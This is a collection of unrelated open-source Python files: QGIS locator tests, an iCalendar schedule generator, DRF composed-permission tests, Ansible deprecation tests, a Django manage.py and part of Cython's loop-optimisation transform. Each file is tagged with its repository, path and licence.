self.assertFalse(sip.isdeleted(filter_d))
self.assertEqual(l.filters(), [filter_d])
del l
self.assertTrue(sip.isdeleted(filter_c))
self.assertTrue(sip.isdeleted(filter_d))
def testFetchingResults(self):
def got_hit(result):
got_hit._results_.append(result.displayString)
got_hit._results_ = []
context = QgsLocatorContext()
# one filter
l = QgsLocator()
filter_a = test_filter('a')
l.registerFilter(filter_a)
l.foundResult.connect(got_hit)
l.fetchResults('a', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2'})
# two filters
filter_b = test_filter('b')
l.registerFilter(filter_b)
got_hit._results_ = []
l.fetchResults('a', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2', 'b0', 'b1', 'b2'})
def testFetchingResultsDelayed(self):
def got_hit(result):
got_hit._results_.append(result.displayString)
got_hit._results_ = []
context = QgsLocatorContext()
# one filter
l = QgsLocator()
filter_a = test_filter('a')
filter_a.setFetchResultsDelay(100)
l.registerFilter(filter_a)
l.foundResult.connect(got_hit)
l.fetchResults('a', context)
for i in range(500):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2'})
# two filters
filter_b = test_filter('b')
l.registerFilter(filter_b)
got_hit._results_ = []
l.fetchResults('a', context)
for i in range(500):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2', 'b0', 'b1', 'b2'})
def testDeleteWhileFetchingResults(self):
"""
Delete locator whilst fetching results
"""
def got_hit(result):
got_hit._results_.append(result.displayString)
got_hit._results_ = []
context = QgsLocatorContext()
l = QgsLocator()
filter_a = test_filter('a')
l.registerFilter(filter_a)
l.foundResult.connect(got_hit)
l.fetchResults('a', context)
del l
def testCancelWhileFetchingResults(self):
"""
Cancel locator whilst fetching results
"""
def got_hit(result):
got_hit._results_.append(result.displayString)
got_hit._results_ = []
context = QgsLocatorContext()
l = QgsLocator()
filter_a = test_filter('a')
l.registerFilter(filter_a)
l.foundResult.connect(got_hit)
l.fetchResults('a', context)
l.cancel()
def testPrefixes(self):
"""
Test custom (active) prefixes
"""
def got_hit(result):
got_hit._results_.append(result.displayString)
got_hit._results_ = []
context = QgsLocatorContext()
l = QgsLocator()
# filter with prefix
filter_a = test_filter('a', 'aaa')
l.registerFilter(filter_a)
self.assertEqual(filter_a.prefix(), 'aaa')
self.assertEqual(filter_a.activePrefix(), 'aaa')
self.assertEqual(filter_a.useWithoutPrefix(), True)
l.foundResult.connect(got_hit)
l.fetchResults('aaa a', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2'})
got_hit._results_ = []
l.fetchResults('bbb b', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2'})
got_hit._results_ = []
filter_a.setUseWithoutPrefix(False)
self.assertEqual(filter_a.useWithoutPrefix(), False)
l.fetchResults('bbb b', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(got_hit._results_, [])
got_hit._results_ = []
l.fetchResults('AaA a', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2'})
# test with two filters
filter_b = test_filter('b', 'bbb')
l.registerFilter(filter_b)
self.assertEqual(filter_b.prefix(), 'bbb')
self.assertEqual(filter_b.activePrefix(), 'bbb')
got_hit._results_ = []
l.fetchResults('bbb b', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'b0', 'b1', 'b2'})
l.deregisterFilter(filter_b)
# test with two filters with same prefix
filter_b = test_filter('b', 'aaa')
l.registerFilter(filter_b)
self.assertEqual(filter_b.prefix(), 'aaa')
self.assertEqual(filter_b.activePrefix(), 'aaa')
got_hit._results_ = []
l.fetchResults('aaa b', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2', 'b0', 'b1', 'b2'})
l.deregisterFilter(filter_b)
# filter with invalid prefix (less than 3 char)
filter_c = test_filter('c', 'bb')
l.registerFilter(filter_c)
self.assertEqual(filter_c.prefix(), 'bb')
self.assertEqual(filter_c.activePrefix(), '')
got_hit._results_ = []
l.fetchResults('b', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'c0', 'c1', 'c2'})
l.deregisterFilter(filter_c)
# filter with custom prefix
QgsSettings().setValue("locator_filters/prefix_test_custom", 'xyz', QgsSettings.Gui)
filter_c = test_filter('custom', 'abc')
l.registerFilter(filter_c)
self.assertEqual(filter_c.prefix(), 'abc')
self.assertEqual(filter_c.activePrefix(), 'xyz')
got_hit._results_ = []
l.fetchResults('b', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'custom0', 'custom1', 'custom2'})
filter_c.setUseWithoutPrefix(False)
got_hit._results_ = []
l.fetchResults('XyZ b', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(set(got_hit._results_), {'custom0', 'custom1', 'custom2'})
l.deregisterFilter(filter_c)
del l
def testModel(self):
m = QgsLocatorModel()
p = QgsLocatorProxyModel(m)
p.setSourceModel(m)
l = QgsLocator()
filter_a = test_filter('a')
l.registerFilter(filter_a)
l.foundResult.connect(m.addResult)
context = QgsLocatorContext()
l.fetchResults('a', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
# 4 results - one is locator name
self.assertEqual(p.rowCount(), 4)
self.assertEqual(p.data(p.index(0, 0)), 'test_a')
self.assertEqual(p.data(p.index(0, 0), QgsLocatorModel.ResultTypeRole), 0)
self.assertEqual(p.data(p.index(0, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
self.assertEqual(p.data(p.index(1, 0)), 'a0')
self.assertEqual(p.data(p.index(1, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
self.assertEqual(p.data(p.index(1, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
self.assertEqual(p.data(p.index(2, 0)), 'a1')
self.assertEqual(p.data(p.index(2, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
self.assertEqual(p.data(p.index(2, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
self.assertEqual(p.data(p.index(3, 0)), 'a2')
self.assertEqual(p.data(p.index(3, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
self.assertEqual(p.data(p.index(3, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
m.clear()
self.assertEqual(p.rowCount(), 0)
l.fetchResults('b', context)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(p.rowCount(), 4)
self.assertEqual(p.data(p.index(1, 0)), 'a0')
self.assertEqual(p.data(p.index(2, 0)), 'a1')
self.assertEqual(p.data(p.index(3, 0)), 'a2')
m.deferredClear()
# should not be immediately cleared!
self.assertEqual(p.rowCount(), 4)
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(p.rowCount(), 0)
m.clear()
# test with groups
self.assertEqual(p.rowCount(), 0)
filter_b = test_filter('b', None, True)
l.registerFilter(filter_b)
l.fetchResults('c', context)
for i in range(200):
sleep(0.002)
QCoreApplication.processEvents()
self.assertEqual(p.rowCount(), 16) # 1 title a + 3 results + 1 title b + 2 groups + 9 results
self.assertEqual(p.data(p.index(0, 0)), 'test_a')
self.assertEqual(p.data(p.index(0, 0), QgsLocatorModel.ResultTypeRole), 0)
self.assertEqual(p.data(p.index(1, 0)), 'a0')
self.assertEqual(p.data(p.index(1, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
self.assertEqual(p.data(p.index(2, 0)), 'a1')
self.assertEqual(p.data(p.index(2, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
self.assertEqual(p.data(p.index(3, 0)), 'a2')
self.assertEqual(p.data(p.index(3, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
self.assertEqual(p.data(p.index(4, 0)), 'test_b')
self.assertEqual(p.data(p.index(4, 0), QgsLocatorModel.ResultTypeRole), 0)
self.assertEqual(p.data(p.index(4, 0), QgsLocatorModel.ResultFilterNameRole), 'test_b')
self.assertEqual(p.data(p.index(5, 0)).strip(), 'first group')
self.assertEqual(p.data(p.index(5, 0), QgsLocatorModel.ResultTypeRole), 1)
self.assertEqual(p.data(p.index(6, 0)), 'b0')
self.assertEqual(p.data(p.index(6, 0), QgsLocatorModel.ResultTypeRole), 1)
self.assertEqual(p.data(p.index(7, 0)), 'b1')
self.assertEqual(p.data(p.index(7, 0), QgsLocatorModel.ResultTypeRole), 1)
self.assertEqual(p.data(p.index(8, 0)), 'b3')
self.assertEqual(p.data(p.index(8, 0), QgsLocatorModel.ResultTypeRole), 1)
self.assertEqual(p.data(p.index(9, 0)), 'b5')
self.assertEqual(p.data(p.index(9, 0), QgsLocatorModel.ResultTypeRole), 1)
self.assertEqual(p.data(p.index(10, 0)), 'b6')
self.assertEqual(p.data(p.index(10, 0), QgsLocatorModel.ResultTypeRole), 1)
self.assertEqual(p.data(p.index(11, 0)).strip(), 'second group')
self.assertEqual(p.data(p.index(11, 0), QgsLocatorModel.ResultTypeRole), 2)
self.assertEqual(p.data(p.index(12, 0)), 'b4')
self.assertEqual(p.data(p.index(12, 0), QgsLocatorModel.ResultTypeRole), 2)
self.assertEqual(p.data(p.index(13, 0)), 'b8')
self.assertEqual(p.data(p.index(13, 0), QgsLocatorModel.ResultTypeRole), 2)
self.assertEqual(p.data(p.index(14, 0)), 'b2')
self.assertEqual(p.data(p.index(14, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
self.assertEqual(p.data(p.index(15, 0)), 'b7')
self.assertEqual(p.data(p.index(15, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
def testAutoModel(self):
"""
Test automatic model, QgsLocatorAutomaticModel - should be no need
for any manual connections
"""
l = QgsLocator()
m = QgsLocatorAutomaticModel(l)
filter_a = test_filter('a')
l.registerFilter(filter_a)
m.search('a')
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
# 4 results - one is locator name
self.assertEqual(m.rowCount(), 4)
self.assertEqual(m.data(m.index(0, 0)), 'test_a')
self.assertEqual(m.data(m.index(0, 0), QgsLocatorModel.ResultTypeRole), 0)
self.assertEqual(m.data(m.index(0, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
self.assertEqual(m.data(m.index(1, 0)), 'a0')
self.assertEqual(m.data(m.index(1, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
self.assertEqual(m.data(m.index(1, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
self.assertEqual(m.data(m.index(2, 0)), 'a1')
self.assertEqual(m.data(m.index(2, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
self.assertEqual(m.data(m.index(2, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
self.assertEqual(m.data(m.index(3, 0)), 'a2')
self.assertEqual(m.data(m.index(3, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
self.assertEqual(m.data(m.index(3, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
m.search('a')
for i in range(100):
sleep(0.002)
QCoreApplication.processEvents()
# 4 results - one is locator name
self.assertEqual(m.rowCount(), 4)
self.assertEqual(m.data(m.index(0, 0)), 'test_a')
self.assertEqual(m.data(m.index(1, 0)), 'a0')
self.assertEqual(m.data(m.index(2, 0)), 'a1')
self.assertEqual(m.data(m.index(3, 0)), 'a2')
def testStringMatches(self):
self.assertFalse(QgsLocatorFilter.stringMatches('xxx', 'yyyy'))
self.assertTrue(QgsLocatorFilter.stringMatches('axxxy', 'xxx'))
self.assertTrue(QgsLocatorFilter.stringMatches('aXXXXy', 'xxx'))
self.assertFalse(QgsLocatorFilter.stringMatches('aXXXXy', ''))
if __name__ == '__main__':
unittest.main()
| pblottiere/QGIS | tests/src/python/test_qgslocator.py | Python | gpl-2.0 | 17,778 |
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
from datetime import date, datetime, timedelta
from icalendar import Calendar, Event, vRecur
import json
import os.path
from os.path import dirname
from uuid import uuid4
class iCalSchedule(object):
DAYS = ['MO', 'TU', 'WE', 'TH', 'FR', 'SA', 'SU']
def __init__(self, scraper, startdate=None, enddate=None):
if startdate is None or enddate is None:
dts, dte = self._get_dates(scraper.period, scraper.year,
scraper.semester)
if startdate is None:
startdate = dts
if enddate is None:
enddate = dte
self.startdate = startdate
# The 'DTEND' property is exclusive, we then must end one day later
self.enddate = enddate + timedelta(days=1)
self._first_weekdays = {} # cache
self._init_ical()
for ev in scraper.get_events():
self.add_event(ev)
def _init_ical(self):
cal = Calendar()
cal.add('version', '2.0')
cal.add('prodid', '-//edt2ics//bfontaine.net//')
cal.add('method', 'publish')
self.cal = cal
def _recur_params(self, wday):
return {
'freq': 'weekly',
'wkst': self.DAYS[0],
'byday': self.DAYS[wday],
'until': self.enddate,
}
def _get_first_weekday(self, day):
"""
Return the first date after ``self.startdate`` which is on the given
weekday (0=Monday, 1=Tuesday, etc)
"""
if day not in self._first_weekdays:
start_wd = self.startdate.weekday()
delta = (day - start_wd + 7) % 7
self._first_weekdays[day] = self.startdate + timedelta(days=delta)
return self._first_weekdays[day]
def _get_dates(self, period, year, semester):
source = os.path.join(dirname(__file__), 'dates.json')
with open(source, 'r') as f:
data = json.loads(f.read())
dates = data['dates'][period][str(semester)][year]
start, end = dates['start'], dates['end']
return self._str2date(start), self._str2date(end)
def _str2date(self, s):
return date(*map(lambda e: int(e, 10), s.split('-')))
def add_event(self, ev):
"""
Add a new recurrent event to this schedule
"""
day = self._get_first_weekday(ev.day)
dtstart = datetime.combine(day, ev.tstart)
dtend = datetime.combine(day, ev.tend)
tz_params = {'tzid': 'Europe/Paris'}
iev = Event()
iev.add('uid', str(uuid4()))
iev.add('status', 'confirmed')
iev.add('dtstart', dtstart, parameters=tz_params)
iev.add('dtend', dtend, parameters=tz_params)
iev.add('rrule', vRecur(self._recur_params(ev.day)))
iev.add('summary', '%s %s' % (ev.type_, ev.title))
iev.add('location', ev.room)
iev.add('description', ev.description)
self.cal.add_component(iev)
def to_ical(self):
return self.cal.to_ical()
| bfontaine/edt2ics | edt2ics/ical.py | Python | mit | 3,060 |
# -*- coding: utf-8 -*-
import unittest
from .base import BaseComposedPermission
from .base import BasePermissionComponent
from .base import And, Or
def create_component(value, instance=False):
class SimpleComponent(BasePermissionComponent):
def has_permission(self, permission, request, view):
return value
def has_object_permission(self, permission, request, view, obj):
return value
if instance:
return SimpleComponent()
return SimpleComponent
def create_permission(callback1, callback2=None):
class Permission(BaseComposedPermission):
if callback1:
global_permission_set = lambda self: callback1()
if callback2:
object_permission_set = lambda self: callback2()
return Permission
class CorePermissionFrameworkTests(unittest.TestCase):
def test_permission_with_unique_component(self):
Component = create_component(True)
Permission = create_permission(lambda: Component, None)
permission = Permission()
self.assertTrue(permission.has_permission(None, None))
#self.assertTrue(len(permission._permission_set.components), 1)
def test_permission_with_two_components_as_list(self):
Component = create_component(True)
Permission = create_permission(lambda: [Component, Component], None)
permission = Permission()
self.assertTrue(permission.has_permission(None, None))
self.assertTrue(len(permission.global_permission_set()), 2)
def test_permission_with_or_permission_set_01(self):
Permission = create_permission(lambda: Or(
create_component(True),
create_component(True),
create_component(True)), None)
permission = Permission()
self.assertTrue(permission.has_permission(None, None))
self.assertTrue(len(permission.global_permission_set().components), 3)
def test_permission_with_or_permission_set_02(self):
# | operator only works for instances and not classes
components = (lambda: Or(
create_component(False)(),
create_component(False)(),
create_component(True)()))
Permission = create_permission(components, components)
permission = Permission()
self.assertTrue(permission.has_permission(None, None))
self.assertTrue(permission.has_object_permission(None, None, None))
self.assertIsInstance(permission.global_permission_set(), Or)
self.assertTrue(len(permission.global_permission_set().components), 3)
def test_permission_with_or_permission_set_03(self):
# | operator only works for instances and not classes
components = (lambda:
create_component(False)() |
create_component(False)() |
create_component(True)())
Permission = create_permission(components, components)
permission = Permission()
self.assertTrue(permission.has_permission(None, None))
self.assertTrue(permission.has_object_permission(None, None, None))
self.assertTrue(len(permission.object_permission_set().components), 3)
def test_permission_with_and_permission_set_01(self):
Permission = create_permission(lambda: And(
create_component(True),
create_component(True),
create_component(True)))
permission = Permission()
self.assertTrue(permission.has_permission(None, None))
self.assertTrue(len(list(permission.global_permission_set().components)), 3)
def test_permission_with_and_permission_set_02(self):
Permission = create_permission(lambda: And(
create_component(False),
create_component(False),
create_component(True)))
permission = Permission()
self.assertFalse(permission.has_permission(None, None))
self.assertTrue(len(list(permission.global_permission_set().components)), 3)
def test_permission_with_and_permission_set_03(self):
Permission = create_permission(lambda: create_component(False)() &
create_component(False)() &
create_component(True)() )
permission = Permission()
self.assertFalse(permission.has_permission(None, None))
self.assertTrue(len(permission.global_permission_set().components), 3)
def test_permission_with_complex_compositions_01(self):
TrueComponent = create_component(True)
FalseComponent = create_component(False)
permissions_set = (TrueComponent() & TrueComponent()) | FalseComponent()
permission = create_permission(lambda: permissions_set)()
self.assertTrue(permission.has_permission(None, None))
def test_permission_with_complex_compositions_02(self):
TrueComponent = create_component(True)
FalseComponent = create_component(False)
permissions_set = ((TrueComponent() & TrueComponent()) &
(FalseComponent() | (TrueComponent() & TrueComponent())))
permission = create_permission(lambda: permissions_set)()
self.assertTrue(permission.has_permission(None, None))
def test_permission_with_complex_compositions_03(self):
TrueComponent = create_component(True)
FalseComponent = create_component(False)
permissions_set = ((TrueComponent() & TrueComponent()) &
(FalseComponent() | (FalseComponent() & TrueComponent())))
permission = create_permission(lambda: permissions_set)()
self.assertFalse(permission.has_permission(None, None))
from .generic import components
class GenericComponentsTests(unittest.TestCase):
def make_mock(self):
class Mock(object):
pass
return Mock()
def make_request(self):
request = self.make_mock()
request.user = self.make_mock()
return request
def test_allow_all(self):
instance = components.AllowAll()
self.assertTrue(instance.has_permission(None, None, None))
def test_allow_only_anonymous(self):
request = self.make_request()
request.user.is_anonymous = lambda: True
instance = components.AllowOnlyAnonymous()
self.assertTrue(instance.has_permission(None, request, None))
def test_allow_authenticated(self):
request = self.make_request()
request.user.is_anonymous = lambda: False
instance = components.AllowOnlyAuthenticated()
self.assertTrue(instance.has_permission(None, request, None))
def test_allow_safe_method_only(self):
request = self.make_request()
request.method = "GET"
instance = components.AllowOnlySafeHttpMethod()
self.assertTrue(instance.has_permission(None, request, None))
def test_obj_attr_equality(self):
obj = self.make_mock()
obj.x = 1
obj.y = 1
instance = components.ObjectAttrEqualToObjectAttr("obj.x", "obj.y")
self.assertTrue(instance.has_object_permission(None, None, None, obj))
| pombredanne/djangorestframework-composed-permissions | restfw_composed_permissions/tests.py | Python | bsd-3-clause | 7,449 |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import pytest
from ansible.module_utils.common import warnings
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_warn(am, capfd):
am.warn('warning1')
with pytest.raises(SystemExit):
am.exit_json(warnings=['warning2'])
out, err = capfd.readouterr()
assert json.loads(out)['warnings'] == ['warning1', 'warning2']
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_deprecate(am, capfd, monkeypatch):
monkeypatch.setattr(warnings, '_global_deprecations', [])
am.deprecate('deprecation1')
am.deprecate('deprecation2', '2.3') # pylint: disable=ansible-deprecated-no-collection-name
am.deprecate('deprecation3', version='2.4') # pylint: disable=ansible-deprecated-no-collection-name
am.deprecate('deprecation4', date='2020-03-10') # pylint: disable=ansible-deprecated-no-collection-name
am.deprecate('deprecation5', collection_name='ansible.builtin')
am.deprecate('deprecation6', '2.3', collection_name='ansible.builtin')
am.deprecate('deprecation7', version='2.4', collection_name='ansible.builtin')
am.deprecate('deprecation8', date='2020-03-10', collection_name='ansible.builtin')
with pytest.raises(SystemExit):
am.exit_json(deprecations=['deprecation9', ('deprecation10', '2.4')])
out, err = capfd.readouterr()
output = json.loads(out)
assert ('warnings' not in output or output['warnings'] == [])
assert output['deprecations'] == [
{u'msg': u'deprecation1', u'version': None, u'collection_name': None},
{u'msg': u'deprecation2', u'version': '2.3', u'collection_name': None},
{u'msg': u'deprecation3', u'version': '2.4', u'collection_name': None},
{u'msg': u'deprecation4', u'date': '2020-03-10', u'collection_name': None},
{u'msg': u'deprecation5', u'version': None, u'collection_name': 'ansible.builtin'},
{u'msg': u'deprecation6', u'version': '2.3', u'collection_name': 'ansible.builtin'},
{u'msg': u'deprecation7', u'version': '2.4', u'collection_name': 'ansible.builtin'},
{u'msg': u'deprecation8', u'date': '2020-03-10', u'collection_name': 'ansible.builtin'},
{u'msg': u'deprecation9', u'version': None, u'collection_name': None},
{u'msg': u'deprecation10', u'version': '2.4', u'collection_name': None},
]
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_deprecate_without_list(am, capfd):
with pytest.raises(SystemExit):
am.exit_json(deprecations='Simple deprecation warning')
out, err = capfd.readouterr()
output = json.loads(out)
assert ('warnings' not in output or output['warnings'] == [])
assert output['deprecations'] == [
{u'msg': u'Simple deprecation warning', u'version': None, u'collection_name': None},
]
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_deprecate_without_list(am, capfd):
with pytest.raises(AssertionError) as ctx:
am.deprecate('Simple deprecation warning', date='', version='')
assert ctx.value.args[0] == "implementation error -- version and date must not both be set"
| dmsimard/ansible | test/units/module_utils/basic/test_deprecate_warn.py | Python | gpl-3.0 | 3,387 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ceph_db_viewer.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| accelazh/ceph_db_viewer | manage.py | Python | mit | 257 |
from __future__ import absolute_import
from . import TypeSlots
from .ExprNodes import not_a_constant
import cython
cython.declare(UtilityCode=object, EncodedString=object, BytesLiteral=object,
Nodes=object, ExprNodes=object, PyrexTypes=object, Builtin=object,
UtilNodes=object)
from . import Nodes
from . import ExprNodes
from . import PyrexTypes
from . import Visitor
from . import Builtin
from . import UtilNodes
from . import Options
from .Code import UtilityCode
from .StringEncoding import EncodedString, BytesLiteral
from .Errors import error
from .ParseTreeTransforms import SkipDeclarations
import copy
import codecs
try:
from __builtin__ import reduce
except ImportError:
from functools import reduce
try:
from __builtin__ import basestring
except ImportError:
basestring = str # Python 3
def load_c_utility(name):
return UtilityCode.load_cached(name, "Optimize.c")
def unwrap_coerced_node(node, coercion_nodes=(ExprNodes.CoerceToPyTypeNode, ExprNodes.CoerceFromPyTypeNode)):
if isinstance(node, coercion_nodes):
return node.arg
return node
def unwrap_node(node):
while isinstance(node, UtilNodes.ResultRefNode):
node = node.expression
return node
def is_common_value(a, b):
a = unwrap_node(a)
b = unwrap_node(b)
if isinstance(a, ExprNodes.NameNode) and isinstance(b, ExprNodes.NameNode):
return a.name == b.name
if isinstance(a, ExprNodes.AttributeNode) and isinstance(b, ExprNodes.AttributeNode):
return not a.is_py_attr and is_common_value(a.obj, b.obj) and a.attribute == b.attribute
return False
def filter_none_node(node):
if node is not None and node.constant_result is None:
return None
return node
class IterationTransform(Visitor.EnvTransform):
"""Transform some common for-in loop patterns into efficient C loops:
- for-in-dict loop becomes a while loop calling PyDict_Next()
- for-in-enumerate is replaced by an external counter variable
- for-in-range loop becomes a plain C for loop
"""
def visit_PrimaryCmpNode(self, node):
if node.is_ptr_contains():
# for t in operand2:
# if operand1 == t:
# res = True
# break
# else:
# res = False
pos = node.pos
result_ref = UtilNodes.ResultRefNode(node)
if isinstance(node.operand2, ExprNodes.IndexNode):
base_type = node.operand2.base.type.base_type
else:
base_type = node.operand2.type.base_type
target_handle = UtilNodes.TempHandle(base_type)
target = target_handle.ref(pos)
cmp_node = ExprNodes.PrimaryCmpNode(
pos, operator=u'==', operand1=node.operand1, operand2=target)
if_body = Nodes.StatListNode(
pos,
stats = [Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=1)),
Nodes.BreakStatNode(pos)])
if_node = Nodes.IfStatNode(
pos,
if_clauses=[Nodes.IfClauseNode(pos, condition=cmp_node, body=if_body)],
else_clause=None)
for_loop = UtilNodes.TempsBlockNode(
pos,
temps = [target_handle],
body = Nodes.ForInStatNode(
pos,
target=target,
iterator=ExprNodes.IteratorNode(node.operand2.pos, sequence=node.operand2),
body=if_node,
else_clause=Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=0))))
for_loop = for_loop.analyse_expressions(self.current_env())
for_loop = self.visit(for_loop)
new_node = UtilNodes.TempResultFromStatNode(result_ref, for_loop)
if node.operator == 'not_in':
new_node = ExprNodes.NotNode(pos, operand=new_node)
return new_node
else:
self.visitchildren(node)
return node
def visit_ForInStatNode(self, node):
self.visitchildren(node)
return self._optimise_for_loop(node, node.iterator.sequence)
def _optimise_for_loop(self, node, iterator, reversed=False):
if iterator.type is Builtin.dict_type:
# like iterating over dict.keys()
if reversed:
# CPython raises an error here: not a sequence
return node
return self._transform_dict_iteration(
node, dict_obj=iterator, method=None, keys=True, values=False)
# C array (slice) iteration?
if iterator.type.is_ptr or iterator.type.is_array:
return self._transform_carray_iteration(node, iterator, reversed=reversed)
if iterator.type is Builtin.bytes_type:
return self._transform_bytes_iteration(node, iterator, reversed=reversed)
if iterator.type is Builtin.unicode_type:
return self._transform_unicode_iteration(node, iterator, reversed=reversed)
# the rest is based on function calls
if not isinstance(iterator, ExprNodes.SimpleCallNode):
return node
if iterator.args is None:
arg_count = iterator.arg_tuple and len(iterator.arg_tuple.args) or 0
else:
arg_count = len(iterator.args)
if arg_count and iterator.self is not None:
arg_count -= 1
function = iterator.function
# dict iteration?
if function.is_attribute and not reversed and not arg_count:
base_obj = iterator.self or function.obj
method = function.attribute
# in Py3, items() is equivalent to Py2's iteritems()
is_safe_iter = self.global_scope().context.language_level >= 3
if not is_safe_iter and method in ('keys', 'values', 'items'):
# try to reduce this to the corresponding .iter*() methods
if isinstance(base_obj, ExprNodes.SimpleCallNode):
inner_function = base_obj.function
if (inner_function.is_name and inner_function.name == 'dict'
and inner_function.entry
and inner_function.entry.is_builtin):
# e.g. dict(something).items() => safe to use .iter*()
is_safe_iter = True
keys = values = False
if method == 'iterkeys' or (is_safe_iter and method == 'keys'):
keys = True
elif method == 'itervalues' or (is_safe_iter and method == 'values'):
values = True
elif method == 'iteritems' or (is_safe_iter and method == 'items'):
keys = values = True
if keys or values:
return self._transform_dict_iteration(
node, base_obj, method, keys, values)
# enumerate/reversed ?
if iterator.self is None and function.is_name and \
function.entry and function.entry.is_builtin:
if function.name == 'enumerate':
if reversed:
# CPython raises an error here: not a sequence
return node
return self._transform_enumerate_iteration(node, iterator)
elif function.name == 'reversed':
if reversed:
# CPython raises an error here: not a sequence
return node
return self._transform_reversed_iteration(node, iterator)
# range() iteration?
if Options.convert_range and node.target.type.is_int:
if iterator.self is None and function.is_name and \
function.entry and function.entry.is_builtin and \
function.name in ('range', 'xrange'):
return self._transform_range_iteration(node, iterator, reversed=reversed)
return node
def _transform_reversed_iteration(self, node, reversed_function):
args = reversed_function.arg_tuple.args
if len(args) == 0:
error(reversed_function.pos,
"reversed() requires an iterable argument")
return node
elif len(args) > 1:
error(reversed_function.pos,
"reversed() takes exactly 1 argument")
return node
arg = args[0]
# reversed(list/tuple) ?
if arg.type in (Builtin.tuple_type, Builtin.list_type):
node.iterator.sequence = arg.as_none_safe_node("'NoneType' object is not iterable")
node.iterator.reversed = True
return node
return self._optimise_for_loop(node, arg, reversed=True)
PyBytes_AS_STRING_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_char_ptr_type, [
PyrexTypes.CFuncTypeArg("s", Builtin.bytes_type, None)
])
PyBytes_GET_SIZE_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("s", Builtin.bytes_type, None)
])
def _transform_bytes_iteration(self, node, slice_node, reversed=False):
target_type = node.target.type
if not target_type.is_int and target_type is not Builtin.bytes_type:
# bytes iteration returns bytes objects in Py2, but
# integers in Py3
return node
unpack_temp_node = UtilNodes.LetRefNode(
slice_node.as_none_safe_node("'NoneType' is not iterable"))
slice_base_node = ExprNodes.PythonCapiCallNode(
slice_node.pos, "PyBytes_AS_STRING",
self.PyBytes_AS_STRING_func_type,
args = [unpack_temp_node],
is_temp = 0,
)
len_node = ExprNodes.PythonCapiCallNode(
slice_node.pos, "PyBytes_GET_SIZE",
self.PyBytes_GET_SIZE_func_type,
args = [unpack_temp_node],
is_temp = 0,
)
return UtilNodes.LetNode(
unpack_temp_node,
self._transform_carray_iteration(
node,
ExprNodes.SliceIndexNode(
slice_node.pos,
base = slice_base_node,
start = None,
step = None,
stop = len_node,
type = slice_base_node.type,
is_temp = 1,
),
reversed = reversed))
PyUnicode_READ_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ucs4_type, [
PyrexTypes.CFuncTypeArg("kind", PyrexTypes.c_int_type, None),
PyrexTypes.CFuncTypeArg("data", PyrexTypes.c_void_ptr_type, None),
PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_py_ssize_t_type, None)
])
